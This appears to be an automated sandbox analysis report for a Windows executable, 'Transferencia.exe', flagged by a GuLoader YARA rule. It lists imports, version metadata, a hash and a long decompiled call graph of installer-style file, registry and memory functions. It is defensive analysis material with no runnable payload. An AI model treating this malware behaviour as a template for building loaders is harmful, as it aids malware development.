                                              COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
                                              USER32.dllGetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
                                              GDI32.dllSetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                                              KERNEL32.dllGetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, CreateFileW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW
                                              DescriptionData
                                              LegalCopyrightMarkedsana
                                              FileVersion24.8.29
                                              CompanyNamevugvalidatin
                                              LegalTrademarksMETACINNAB
                                              CommentsSpiroloculin113
                                              ProductNameLeuk
                                              FileDescriptionJanfridelefrek82
                                              Translation0x0409 0x04b0
                                              Language of compilation systemCountry where language is spokenMap
                                              EnglishUnited States
                                              No network behavior found

                                              Click to jump to process

                                              Click to jump to process

                                              Click to dive into process behavior distribution

                                              Target ID:0
                                              Start time:13:18:06
                                              Start date:11/05/2022
                                              Path:C:\Users\user\Desktop\Transferencia.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\Transferencia.exe"
                                              Imagebase:0x400000
                                              File size:254208 bytes
                                              MD5 hash:FB1D131568BDD2FA951608534F83A75C
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.756250628.0000000002D50000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:low

                                              Reset < >

                                                Execution Graph

                                                Execution Coverage:18.1%
                                                Dynamic/Decrypted Code Coverage:0%
                                                Signature Coverage:16%
                                                Total number of Nodes:1586
                                                Total number of Limit Nodes:35
                                                execution_graph 4053 401941 4054 401943 4053->4054 4059 402da6 4054->4059 4060 402db2 4059->4060 4105 406557 4060->4105 4063 401948 4065 405c26 4063->4065 4147 405ef1 4065->4147 4068 405c4e DeleteFileW 4075 401951 4068->4075 4069 405c65 4070 405d90 4069->4070 4161 40651a lstrcpynW 4069->4161 4070->4075 4190 406850 FindFirstFileW 4070->4190 4072 405c8b 4073 405c91 lstrcatW 4072->4073 4074 405c9e 4072->4074 4076 405ca4 4073->4076 4162 405e35 lstrlenW 4074->4162 4079 405cb4 lstrcatW 4076->4079 4080 405caa 4076->4080 4082 405cbf lstrlenW FindFirstFileW 4079->4082 4080->4079 4080->4082 4084 405d85 4082->4084 4103 405ce1 4082->4103 4083 405dae 4193 405de9 lstrlenW CharPrevW 4083->4193 4084->4070 4087 405d68 FindNextFileW 4091 405d7e FindClose 4087->4091 4087->4103 4088 405bde 5 API calls 4090 405dc0 4088->4090 4092 405dc4 4090->4092 4093 405dda 4090->4093 4091->4084 4092->4075 4097 40557c 24 API calls 4092->4097 4095 40557c 24 API calls 4093->4095 4095->4075 4096 405c26 60 API calls 4096->4103 4098 405dd1 4097->4098 4099 4062da 36 API calls 4098->4099 4101 405dd8 4099->4101 4100 40557c 24 API calls 4100->4087 4101->4075 4103->4087 4103->4096 4103->4100 4166 40651a lstrcpynW 4103->4166 4167 405bde 4103->4167 4175 40557c 4103->4175 4186 4062da MoveFileExW 4103->4186 4116 406564 4105->4116 4106 406787 4107 402dd3 4106->4107 4138 40651a lstrcpynW 4106->4138 4107->4063 4122 4067a1 4107->4122 4109 406755 lstrlenW 4109->4116 4111 406557 10 API calls 4111->4109 4112 40666c GetSystemDirectoryW 4112->4116 4115 40667f GetWindowsDirectoryW 4115->4116 4116->4106 4116->4109 4116->4111 4116->4112 4116->4115 4117 4066f6 lstrcatW 4116->4117 4118 406557 10 API calls 4116->4118 4119 4067a1 5 API calls 4116->4119 4120 4066ae SHGetSpecialFolderLocation 4116->4120 4131 4063e8 4116->4131 4136 406461 wsprintfW 4116->4136 4137 40651a lstrcpynW 4116->4137 4117->4116 4118->4116 4119->4116 4120->4116 4121 4066c6 SHGetPathFromIDListW CoTaskMemFree 4120->4121 4121->4116 4128 4067ae 4122->4128 4123 406824 4124 406829 CharPrevW 4123->4124 4126 40684a 4123->4126 4124->4123 4125 406817 CharNextW 4125->4123 4125->4128 4126->4063 4128->4123 4128->4125 4129 406803 CharNextW 4128->4129 4130 406812 CharNextW 4128->4130 4143 405e16 4128->4143 4129->4128 4130->4125 4139 406387 4131->4139 4134 40644c 4134->4116 4135 40641c RegQueryValueExW RegCloseKey 4135->4134 4136->4116 4137->4116 4138->4107 4140 406396 4139->4140 4141 40639a 4140->4141 4142 40639f RegOpenKeyExW 4140->4142 4141->4134 4141->4135 4142->4141 4145 405e1c 4143->4145 4144 405e32 4144->4128 4145->4144 4146 405e23 CharNextW 4145->4146 4146->4145 4196 40651a lstrcpynW 4147->4196 4149 405f02 4197 405e94 CharNextW CharNextW 4149->4197 4152 405c46 4152->4068 4152->4069 4153 4067a1 5 API calls 4159 405f18 4153->4159 4154 405f49 lstrlenW 4155 405f54 4154->4155 4154->4159 4157 405de9 3 API calls 4155->4157 4156 406850 2 API calls 4156->4159 4158 405f59 GetFileAttributesW 4157->4158 4158->4152 4159->4152 4159->4154 4159->4156 4160 405e35 2 API calls 4159->4160 4160->4154 4161->4072 4163 405e43 4162->4163 4164 405e55 4163->4164 4165 405e49 CharPrevW 4163->4165 4164->4076 4165->4163 4165->4164 4166->4103 4203 405fe5 GetFileAttributesW 4167->4203 4170 405c0b 4170->4103 4171 405c01 DeleteFileW 4173 405c07 4171->4173 4172 405bf9 RemoveDirectoryW 4172->4173 4173->4170 4174 405c17 SetFileAttributesW 4173->4174 4174->4170 4176 405597 4175->4176 4185 405639 4175->4185 4177 4055b3 lstrlenW 4176->4177 4178 406557 17 API calls 4176->4178 4179 4055c1 lstrlenW 4177->4179 4180 4055dc 4177->4180 4178->4177 4183 4055d3 lstrcatW 4179->4183 4179->4185 4181 4055e2 SetWindowTextW 4180->4181 4182 4055ef 4180->4182 4181->4182 4184 4055f5 SendMessageW SendMessageW SendMessageW 4182->4184 4182->4185 4183->4180 4184->4185 4185->4103 4187 4062fb 4186->4187 4188 4062ee 4186->4188 4187->4103 4206 406160 4188->4206 4191 405daa 4190->4191 4192 406866 FindClose 4190->4192 4191->4075 4191->4083 4192->4191 4194 405db4 4193->4194 4195 405e05 lstrcatW 4193->4195 4194->4088 4195->4194 4196->4149 4199 405eb1 4197->4199 4201 405ec3 4197->4201 4198 405ee7 4198->4152 4198->4153 4200 405ebe CharNextW 4199->4200 4199->4201 4200->4198 4201->4198 4202 405e16 CharNextW 4201->4202 4202->4201 4204 405bea 4203->4204 4205 405ff7 SetFileAttributesW 4203->4205 4204->4170 4204->4171 4204->4172 4205->4204 4207 406190 4206->4207 4208 4061b6 GetShortPathNameW 4206->4208 4233 40600a GetFileAttributesW CreateFileW 4207->4233 4210 4062d5 4208->4210 4211 4061cb 4208->4211 4210->4187 4211->4210 4213 4061d3 wsprintfA 4211->4213 4212 40619a CloseHandle GetShortPathNameW 4212->4210 4214 4061ae 4212->4214 4215 406557 17 API calls 4213->4215 4214->4208 4214->4210 4216 4061fb 4215->4216 4234 40600a GetFileAttributesW CreateFileW 4216->4234 4218 406208 4218->4210 4219 406217 GetFileSize GlobalAlloc 4218->4219 4220 406239 4219->4220 4221 4062ce CloseHandle 4219->4221 4235 40608d ReadFile 4220->4235 4221->4210 4226 406258 lstrcpyA 4228 40627a 4226->4228 4227 40626c 4229 405f6f 4 API calls 4227->4229 4230 4062b1 SetFilePointer 4228->4230 4229->4228 4242 4060bc WriteFile 4230->4242 4233->4212 4234->4218 4236 4060ab 4235->4236 4236->4221 4237 405f6f lstrlenA 4236->4237 4238 405fb0 lstrlenA 4237->4238 4239 405fb8 4238->4239 4240 405f89 lstrcmpiA 4238->4240 4239->4226 4239->4227 4240->4239 4241 405fa7 CharNextA 4240->4241 4241->4238 4243 4060da GlobalFree 4242->4243 4243->4221 4244 4015c1 4245 402da6 17 API calls 4244->4245 4246 4015c8 4245->4246 4247 405e94 4 API calls 4246->4247 4259 4015d1 4247->4259 4248 401631 4250 401663 4248->4250 4251 401636 4248->4251 4249 405e16 CharNextW 4249->4259 4253 401423 24 API calls 4250->4253 4271 401423 4251->4271 4260 40165b 4253->4260 4258 40164a SetCurrentDirectoryW 4258->4260 4259->4248 4259->4249 4261 401617 GetFileAttributesW 4259->4261 4263 405ae5 4259->4263 4266 405a4b CreateDirectoryW 4259->4266 4275 405ac8 CreateDirectoryW 4259->4275 4261->4259 4278 4068e7 GetModuleHandleA 4263->4278 4267 405a98 4266->4267 4268 405a9c GetLastError 4266->4268 4267->4259 4268->4267 4269 405aab SetFileSecurityW 4268->4269 4269->4267 4270 405ac1 GetLastError 4269->4270 4270->4267 4272 40557c 24 API calls 4271->4272 4273 401431 4272->4273 4274 40651a lstrcpynW 4273->4274 4274->4258 4276 405ad8 4275->4276 4277 405adc GetLastError 4275->4277 4276->4259 4277->4276 4279 406903 4278->4279 4280 40690d GetProcAddress 4278->4280 4284 406877 GetSystemDirectoryW 4279->4284 4282 405aec 4280->4282 4282->4259 4283 406909 4283->4280 4283->4282 4285 406899 wsprintfW LoadLibraryExW 4284->4285 4285->4283 5036 401c43 5037 402d84 17 API calls 5036->5037 5038 401c4a 5037->5038 5039 402d84 17 API calls 5038->5039 5040 401c57 5039->5040 5041 401c6c 5040->5041 5042 402da6 17 API calls 5040->5042 5043 402da6 17 API calls 5041->5043 5048 401c7c 5041->5048 5042->5041 5043->5048 5044 401cd3 5047 402da6 17 API calls 5044->5047 5045 401c87 5046 402d84 17 API calls 5045->5046 5049 401c8c 5046->5049 5050 401cd8 5047->5050 5048->5044 5048->5045 5051 402d84 17 API calls 5049->5051 5052 402da6 17 API calls 5050->5052 5053 401c98 5051->5053 5054 401ce1 FindWindowExW 5052->5054 5055 401cc3 SendMessageW 5053->5055 5056 401ca5 SendMessageTimeoutW 5053->5056 5057 401d03 5054->5057 5055->5057 5056->5057 5058 4028c4 5059 4028ca 5058->5059 5060 4028d2 FindClose 5059->5060 5061 402c2a 5059->5061 5060->5061 5065 4016cc 5066 402da6 17 API calls 5065->5066 5067 4016d2 GetFullPathNameW 5066->5067 5068 4016ec 5067->5068 5074 40170e 5067->5074 5071 406850 2 API calls 5068->5071 5068->5074 5069 401723 GetShortPathNameW 5070 402c2a 5069->5070 5072 4016fe 5071->5072 5072->5074 5075 40651a lstrcpynW 5072->5075 5074->5069 5074->5070 5075->5074 5076 401e4e GetDC 5077 402d84 17 API calls 5076->5077 5078 401e60 GetDeviceCaps MulDiv ReleaseDC 5077->5078 5079 402d84 17 API calls 5078->5079 5080 401e91 5079->5080 5081 406557 17 API calls 5080->5081 5082 401ece CreateFontIndirectW 5081->5082 5083 402638 5082->5083 5084 402950 5085 402da6 17 API calls 5084->5085 5087 40295c 5085->5087 5086 402972 5089 405fe5 2 API calls 5086->5089 5087->5086 5088 402da6 17 API calls 5087->5088 5088->5086 5090 402978 5089->5090 5112 40600a GetFileAttributesW CreateFileW 5090->5112 5092 402985 5093 402a3b 5092->5093 5094 4029a0 GlobalAlloc 5092->5094 5095 402a23 5092->5095 5096 402a42 DeleteFileW 5093->5096 5097 402a55 5093->5097 5094->5095 5098 4029b9 5094->5098 5099 4032b4 31 API calls 5095->5099 5096->5097 5113 4034c2 SetFilePointer 5098->5113 5101 402a30 CloseHandle 5099->5101 5101->5093 5102 4029bf 5103 4034ac ReadFile 5102->5103 5104 4029c8 GlobalAlloc 5103->5104 5105 4029d8 5104->5105 5106 402a0c 5104->5106 5107 4032b4 31 API calls 5105->5107 5108 4060bc WriteFile 5106->5108 5111 4029e5 5107->5111 5109 402a18 GlobalFree 5108->5109 5109->5095 5110 402a03 GlobalFree 5110->5106 5111->5110 5112->5092 5113->5102 5114 401956 5115 402da6 17 API calls 5114->5115 5116 40195d lstrlenW 5115->5116 5117 402638 5116->5117 4651 4014d7 4656 402d84 4651->4656 4653 4014dd Sleep 4655 402c2a 4653->4655 4657 406557 17 API calls 4656->4657 4658 402d99 4657->4658 4658->4653 5118 732a103d 5121 732a101b 5118->5121 5128 732a15b6 5121->5128 5123 732a1020 5124 732a1027 GlobalAlloc 5123->5124 5125 732a1024 5123->5125 5124->5125 5126 732a15dd 3 API calls 5125->5126 5127 732a103b 5126->5127 5130 732a15bc 5128->5130 5129 732a15c2 5129->5123 5130->5129 5131 732a15ce GlobalFree 5130->5131 5131->5123 4755 4020d8 4756 4020ea 4755->4756 4766 40219c 4755->4766 4757 402da6 17 API calls 4756->4757 4759 4020f1 4757->4759 4758 401423 24 API calls 4764 4022f6 4758->4764 4760 402da6 17 API calls 4759->4760 4761 4020fa 4760->4761 4762 402110 LoadLibraryExW 4761->4762 4763 402102 GetModuleHandleW 4761->4763 4765 402121 4762->4765 4762->4766 4763->4762 4763->4765 4778 406956 4765->4778 4766->4758 4769 402132 4772 402151 4769->4772 4773 40213a 4769->4773 4770 40216b 4771 40557c 24 API calls 4770->4771 4774 402142 4771->4774 4783 732a1817 4772->4783 4775 401423 24 API calls 4773->4775 4774->4764 4776 40218e FreeLibrary 4774->4776 4775->4774 4776->4764 4825 40653c WideCharToMultiByte 4778->4825 4780 406973 4781 40697a GetProcAddress 4780->4781 4782 40212c 4780->4782 4781->4782 4782->4769 4782->4770 4784 732a184a 4783->4784 4826 732a1bff 4784->4826 4786 732a1851 4787 732a1976 4786->4787 4788 732a1869 4786->4788 4789 732a1862 4786->4789 4787->4774 4860 732a2480 4788->4860 4876 732a243e 4789->4876 4794 732a18af 4889 732a2655 4794->4889 4795 732a18cd 4800 732a191e 4795->4800 4801 732a18d3 4795->4801 4796 732a1898 4810 732a188e 4796->4810 4886 732a2e23 4796->4886 4797 732a187f 4799 732a1885 4797->4799 4804 732a1890 4797->4804 4799->4810 4870 732a2b98 4799->4870 4802 732a2655 10 API calls 4800->4802 4908 732a1666 4801->4908 4808 732a190f 4802->4808 4803 732a18b5 4900 732a1654 4803->4900 4880 732a2810 4804->4880 4816 732a1965 4808->4816 4914 732a2618 4808->4914 4810->4794 4810->4795 4814 732a1896 4814->4810 4815 732a2655 10 API calls 4815->4808 4816->4787 4820 732a196f GlobalFree 4816->4820 4820->4787 4822 732a1951 4822->4816 4918 732a15dd wsprintfW 4822->4918 4823 732a194a FreeLibrary 4823->4822 4825->4780 4921 732a12bb GlobalAlloc 4826->4921 4828 732a1c26 4922 732a12bb GlobalAlloc 4828->4922 4830 732a1e6b GlobalFree GlobalFree GlobalFree 4831 732a1e88 4830->4831 4852 732a1ed2 4830->4852 4832 732a227e 4831->4832 4840 732a1e9d 4831->4840 4831->4852 4834 732a22a0 GetModuleHandleW 4832->4834 4832->4852 4833 732a1d26 GlobalAlloc 4846 732a1c31 4833->4846 4837 732a22b1 LoadLibraryW 4834->4837 4838 732a22c6 4834->4838 4835 732a1d71 lstrcpyW 4839 732a1d7b lstrcpyW 4835->4839 4836 732a1d8f GlobalFree 4836->4846 4837->4838 4837->4852 4929 732a16bd WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4838->4929 4839->4846 4840->4852 4925 732a12cc 4840->4925 4842 732a2126 4928 732a12bb GlobalAlloc 4842->4928 4843 732a2318 4845 732a2325 lstrlenW 4843->4845 4843->4852 4930 732a16bd WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4845->4930 4846->4830 4846->4833 4846->4835 4846->4836 4846->4839 4846->4842 4850 732a2067 GlobalFree 4846->4850 4851 732a21ae 4846->4851 4846->4852 4854 732a12cc 2 API calls 4846->4854 4855 732a1dcd 4846->4855 4848 732a22d8 4848->4843 4858 732a2302 GetProcAddress 4848->4858 4850->4846 4851->4852 4857 732a2216 lstrcpyW 4851->4857 4852->4786 4853 732a233f 4853->4852 4854->4846 4855->4846 4923 732a162f GlobalSize GlobalAlloc 4855->4923 4857->4852 4858->4843 4859 732a212f 4859->4786 4867 732a2498 4860->4867 4861 732a12cc GlobalAlloc lstrcpynW 4861->4867 4863 732a25c1 GlobalFree 4866 732a186f 4863->4866 4863->4867 4864 732a256b GlobalAlloc CLSIDFromString 4864->4863 4865 732a2540 GlobalAlloc WideCharToMultiByte 4865->4863 4866->4796 4866->4797 4866->4810 4867->4861 4867->4863 4867->4864 4867->4865 4869 732a258a 4867->4869 4932 732a135a 4867->4932 4869->4863 4936 732a27a4 4869->4936 4872 732a2baa 4870->4872 4871 732a2c4f ReadFile 4875 732a2c6d 4871->4875 4872->4871 4874 732a2d39 4874->4810 4939 732a2b42 4875->4939 4877 732a2453 4876->4877 4878 732a245e GlobalAlloc 4877->4878 4879 732a1868 4877->4879 4878->4877 4879->4788 4884 732a2840 4880->4884 4881 732a28db GlobalAlloc 4885 732a28fe 4881->4885 4882 732a28ee 4883 732a28f4 GlobalSize 4882->4883 4882->4885 4883->4885 4884->4881 4884->4882 4885->4814 4887 732a2e2e 4886->4887 4888 732a2e6e GlobalFree 4887->4888 4943 732a12bb GlobalAlloc 4889->4943 4891 732a26fa StringFromGUID2 4896 732a265f 4891->4896 4892 732a270b lstrcpynW 4892->4896 4893 732a26d8 MultiByteToWideChar 4893->4896 4894 732a271e wsprintfW 4894->4896 4895 732a2742 GlobalFree 4895->4896 4896->4891 4896->4892 4896->4893 4896->4894 4896->4895 4897 732a2777 GlobalFree 4896->4897 4898 732a1312 2 API calls 4896->4898 4944 732a1381 4896->4944 4897->4803 4898->4896 4948 732a12bb GlobalAlloc 4900->4948 4902 732a1659 4903 732a1666 2 API calls 4902->4903 4904 732a1663 4903->4904 4905 732a1312 4904->4905 4906 732a131b GlobalAlloc lstrcpynW 4905->4906 4907 732a1355 GlobalFree 4905->4907 4906->4907 4907->4808 4909 732a169f lstrcpyW 4908->4909 4910 732a1672 wsprintfW 4908->4910 4913 732a16b8 4909->4913 4910->4913 4913->4815 4915 732a2626 4914->4915 4916 732a1931 4914->4916 4915->4916 4917 732a2642 GlobalFree 4915->4917 4916->4822 4916->4823 4917->4915 4919 732a1312 2 API calls 4918->4919 4920 732a15fe 4919->4920 4920->4816 4921->4828 4922->4846 4924 732a164d 4923->4924 4924->4855 4931 732a12bb GlobalAlloc 4925->4931 4927 732a12db lstrcpynW 4927->4852 4928->4859 4929->4848 4930->4853 4931->4927 4933 732a1361 4932->4933 4934 732a12cc 2 API calls 4933->4934 4935 732a137f 4934->4935 4935->4867 4937 732a2808 4936->4937 4938 732a27b2 VirtualAlloc 4936->4938 4937->4869 4938->4937 4940 732a2b4d 4939->4940 4941 732a2b5d 4940->4941 4942 732a2b52 GetLastError 4940->4942 4941->4874 4942->4941 4943->4896 4945 732a138a 4944->4945 4946 732a13ac 4944->4946 4945->4946 4947 732a1390 lstrcpyW 4945->4947 4946->4896 4947->4946 4948->4902 5132 402b59 5133 402b60 5132->5133 5134 402bab 5132->5134 5136 402d84 17 API calls 5133->5136 5142 402ba9 5133->5142 5135 4068e7 5 API calls 5134->5135 5137 402bb2 5135->5137 5138 402b6e 5136->5138 5139 402da6 17 API calls 5137->5139 5141 402d84 17 API calls 5138->5141 5140 402bbb 5139->5140 5140->5142 5143 402bbf IIDFromString 5140->5143 5145 402b7a 5141->5145 5143->5142 5144 402bce 5143->5144 5144->5142 5150 40651a lstrcpynW 5144->5150 5149 406461 wsprintfW 5145->5149 5148 402beb CoTaskMemFree 5148->5142 5149->5142 5150->5148 5151 402a5b 5152 402d84 17 API calls 5151->5152 5153 402a61 5152->5153 5154 402aa4 5153->5154 5155 402a88 5153->5155 5160 40292e 5153->5160 5156 402abe 5154->5156 5157 402aae 5154->5157 5158 402a8d 5155->5158 5159 402a9e 5155->5159 5162 406557 17 API calls 5156->5162 5161 402d84 17 API calls 5157->5161 5165 40651a lstrcpynW 5158->5165 5166 406461 wsprintfW 5159->5166 5161->5160 5162->5160 5165->5160 5166->5160 5022 40175c 5023 402da6 17 API calls 5022->5023 5024 401763 5023->5024 5025 406039 2 API calls 5024->5025 5026 40176a 5025->5026 5027 406039 2 API calls 5026->5027 5027->5026 5167 401d5d 5168 402d84 17 API calls 5167->5168 5169 401d6e SetWindowLongW 5168->5169 5170 402c2a 5169->5170 5028 401ede 5029 402d84 17 API calls 5028->5029 5030 401ee4 5029->5030 5031 402d84 17 API calls 5030->5031 5032 401ef0 5031->5032 5033 401f07 EnableWindow 5032->5033 5034 401efc ShowWindow 5032->5034 5035 402c2a 5033->5035 5034->5035 5171 4028de 5172 4028e6 5171->5172 5173 4028ea FindNextFileW 5172->5173 5176 4028fc 5172->5176 5174 402943 5173->5174 5173->5176 5177 40651a lstrcpynW 5174->5177 5177->5176 5178 404ee3 GetDlgItem GetDlgItem 5179 404f35 7 API calls 5178->5179 5185 40515a 5178->5185 5180 404fdc DeleteObject 5179->5180 5181 404fcf SendMessageW 5179->5181 5182 404fe5 5180->5182 5181->5180 5184 40501c 5182->5184 5186 406557 17 API calls 5182->5186 5183 40523c 5188 4052e8 5183->5188 5193 40514d 5183->5193 5198 405295 SendMessageW 5183->5198 5187 404476 18 API calls 5184->5187 5185->5183 5212 4051c9 5185->5212 5232 404e31 SendMessageW 5185->5232 5191 404ffe SendMessageW SendMessageW 5186->5191 5192 405030 5187->5192 5189 4052f2 SendMessageW 5188->5189 5190 4052fa 5188->5190 5189->5190 5200 405313 5190->5200 5201 40530c ImageList_Destroy 5190->5201 5209 405323 5190->5209 5191->5182 5197 404476 18 API calls 5192->5197 5195 4044dd 8 API calls 5193->5195 5194 40522e SendMessageW 5194->5183 5199 4054e9 5195->5199 5213 405041 5197->5213 5198->5193 5203 4052aa SendMessageW 5198->5203 5204 40531c GlobalFree 5200->5204 5200->5209 5201->5200 5202 40549d 5202->5193 5207 4054af ShowWindow GetDlgItem ShowWindow 5202->5207 5206 4052bd 5203->5206 5204->5209 5205 40511c GetWindowLongW SetWindowLongW 5208 405135 5205->5208 5214 4052ce SendMessageW 5206->5214 5207->5193 5210 405152 5208->5210 5211 40513a ShowWindow 5208->5211 5209->5202 5223 40535e 5209->5223 5237 404eb1 5209->5237 5231 4044ab SendMessageW 5210->5231 5230 4044ab SendMessageW 5211->5230 5212->5183 5212->5194 5213->5205 5215 405117 5213->5215 5219 405094 SendMessageW 5213->5219 5220 4050d2 SendMessageW 5213->5220 5221 4050e6 SendMessageW 5213->5221 5214->5188 5215->5205 5215->5208 5216 4053a2 5224 405468 5216->5224 5229 405416 SendMessageW SendMessageW 5216->5229 5219->5213 5220->5213 5221->5213 5223->5216 5226 40538c SendMessageW 5223->5226 5225 405473 InvalidateRect 5224->5225 5227 40547f 5224->5227 5225->5227 5226->5216 5227->5202 5246 404dec 5227->5246 5229->5216 5230->5193 5231->5185 5233 404e90 SendMessageW 5232->5233 5234 404e54 GetMessagePos ScreenToClient SendMessageW 5232->5234 5235 404e88 5233->5235 5234->5235 5236 404e8d 5234->5236 5235->5212 5236->5233 5249 40651a lstrcpynW 5237->5249 5239 404ec4 5250 406461 wsprintfW 5239->5250 5241 404ece 5242 40140b 2 API calls 5241->5242 5243 404ed7 5242->5243 5251 40651a lstrcpynW 5243->5251 5245 404ede 5245->5223 5252 404d23 5246->5252 5248 404e01 5248->5202 5249->5239 5250->5241 5251->5245 5253 404d3c 5252->5253 5254 406557 17 API calls 5253->5254 5255 404da0 5254->5255 5256 406557 17 API calls 5255->5256 5257 404dab 5256->5257 5258 406557 17 API calls 5257->5258 5259 404dc1 lstrlenW wsprintfW SetDlgItemTextW 5258->5259 5259->5248 5260 401563 5261 402ba4 5260->5261 5264 406461 wsprintfW 5261->5264 5263 402ba9 5264->5263 5265 4045e6 lstrlenW 5266 404605 5265->5266 5267 404607 WideCharToMultiByte 5265->5267 5266->5267 5268 732a170d 5269 732a15b6 GlobalFree 5268->5269 5271 732a1725 5269->5271 5270 732a176b GlobalFree 5271->5270 5272 732a1740 5271->5272 5273 732a1757 VirtualFree 5271->5273 5272->5270 5273->5270 5274 404967 5275 404993 5274->5275 5276 4049a4 5274->5276 5335 405b5e GetDlgItemTextW 5275->5335 5278 4049b0 GetDlgItem 5276->5278 5279 404a0f 5276->5279 5282 4049c4 5278->5282 5280 404af3 5279->5280 5289 406557 17 API calls 5279->5289 5333 404ca2 5279->5333 5280->5333 5337 405b5e GetDlgItemTextW 5280->5337 5281 40499e 5283 4067a1 5 API calls 5281->5283 5284 4049d8 SetWindowTextW 5282->5284 5287 405e94 4 API calls 5282->5287 5283->5276 5288 404476 18 API calls 5284->5288 5286 4044dd 8 API calls 5291 404cb6 5286->5291 5292 4049ce 5287->5292 5293 4049f4 5288->5293 5294 404a83 SHBrowseForFolderW 5289->5294 5290 404b23 5295 405ef1 18 API calls 5290->5295 5292->5284 5299 405de9 3 API calls 5292->5299 5296 404476 18 API calls 5293->5296 5294->5280 5297 404a9b CoTaskMemFree 5294->5297 5298 404b29 5295->5298 5300 404a02 5296->5300 5301 405de9 3 API calls 5297->5301 5338 40651a lstrcpynW 5298->5338 5299->5284 5336 4044ab SendMessageW 5300->5336 5308 404aa8 5301->5308 5304 404a08 5307 4068e7 5 API calls 5304->5307 5305 404adf SetDlgItemTextW 5305->5280 5306 404b40 5309 4068e7 5 API calls 5306->5309 5307->5279 5308->5305 5310 406557 17 API calls 5308->5310 5316 404b47 5309->5316 5312 404ac7 lstrcmpiW 5310->5312 5311 404b88 5339 40651a lstrcpynW 5311->5339 5312->5305 5313 404ad8 lstrcatW 5312->5313 5313->5305 5315 404b8f 5317 405e94 4 API calls 5315->5317 5316->5311 5321 405e35 2 API calls 5316->5321 5322 404be0 5316->5322 5318 404b95 GetDiskFreeSpaceW 5317->5318 5320 404bb9 MulDiv 5318->5320 5318->5322 5320->5322 5321->5316 5323 404c51 5322->5323 5325 404dec 20 API calls 5322->5325 5324 404c74 5323->5324 5326 40140b 2 API calls 5323->5326 5340 404498 KiUserCallbackDispatcher 5324->5340 5327 404c3e 5325->5327 5326->5324 5329 404c53 SetDlgItemTextW 5327->5329 5330 404c43 5327->5330 5329->5323 5332 404d23 20 API calls 5330->5332 5331 404c90 5331->5333 5341 4048c0 5331->5341 5332->5323 5333->5286 5335->5281 5336->5304 5337->5290 5338->5306 5339->5315 5340->5331 5342 4048d3 SendMessageW 5341->5342 5343 4048ce 5341->5343 5342->5333 5343->5342 5344 401968 5345 402d84 17 API calls 5344->5345 5346 40196f 5345->5346 5347 402d84 17 API calls 5346->5347 5348 40197c 5347->5348 5349 402da6 17 API calls 5348->5349 5350 401993 lstrlenW 5349->5350 5351 4019a4 5350->5351 5352 4019e5 5351->5352 5356 40651a lstrcpynW 5351->5356 5354 4019d5 5354->5352 5355 4019da lstrlenW 5354->5355 5355->5352 5356->5354 5357 40166a 5358 402da6 17 API calls 5357->5358 5359 401670 5358->5359 5360 406850 2 API calls 5359->5360 5361 401676 5360->5361 5362 732a1000 5363 732a101b 5 API calls 5362->5363 5364 732a1019 5363->5364 5365 402aeb 5366 402d84 17 API calls 5365->5366 5367 402af1 5366->5367 5368 40292e 5367->5368 5369 406557 17 API calls 5367->5369 5369->5368 5370 4026ec 5371 402d84 17 API calls 5370->5371 5373 4026fb 5371->5373 5372 402838 5373->5372 5374 402745 ReadFile 5373->5374 5375 40608d ReadFile 5373->5375 5377 402785 MultiByteToWideChar 5373->5377 5378 40283a 5373->5378 5380 4027ab SetFilePointer MultiByteToWideChar 5373->5380 5381 40284b 5373->5381 5383 4060eb SetFilePointer 5373->5383 5374->5372 5374->5373 5375->5373 5377->5373 5392 406461 wsprintfW 5378->5392 5380->5373 5381->5372 5382 40286c SetFilePointer 5381->5382 5382->5372 5384 406107 5383->5384 5387 40611f 5383->5387 5385 40608d ReadFile 5384->5385 5386 406113 5385->5386 5386->5387 5388 406150 SetFilePointer 5386->5388 5389 406128 SetFilePointer 5386->5389 5387->5373 5388->5387 